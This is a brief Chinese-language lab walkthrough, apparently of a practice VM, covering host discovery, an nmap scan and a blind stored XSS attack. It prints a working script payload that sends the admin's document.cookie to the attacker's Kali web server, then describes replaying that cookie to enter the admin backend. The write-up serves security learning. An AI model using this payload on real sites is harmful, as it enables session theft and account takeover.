工具:VMware(Ubuntu、kali)
实验:
1、部署环境
新建虚拟机并使用镜像——光盘直接启动系统
进入:
还要准备kali环境, 部署完成。
2、在kali探测开放IP情况:
# netdiscover -r 192.168.17.0/24
得到 192.168.17.134 并用 namp 命令扫描其详细情况:
# nmap -sC -sV -p- 192.168.17.134 -n -vv
访问发现为小型网站并可点击admin登录: #盲打知识
通过发送内容可实现XSS注入。
3、在kali上开启http服务监听80端口,在message框中输入组装好的XSS漏洞利用payload。(网址为kali网址)
<script>new Image().src="http://192.168.17.133/123.php?cook="+document.cookie;</script>
盲测:提交后当管理员查看此信息就会出现弹窗。
在kali建立http服务,使可以接受数据。
# python3 -m http.server 80
功能1:用python开启简单的web服务或可打开html;
功能2:记录访问日志(当提交信息后,返回日志);此时得到一个cookie值,这个cookie就是admin用户的cookie。
获取cookie后,就可以利用cookie冒用admin身份进行登陆。(此时可使用cookie-editor插件)
重新点击主页中的admin网页,发现一个直接登陆进去了(cookie值一致才能进入),此时进入后台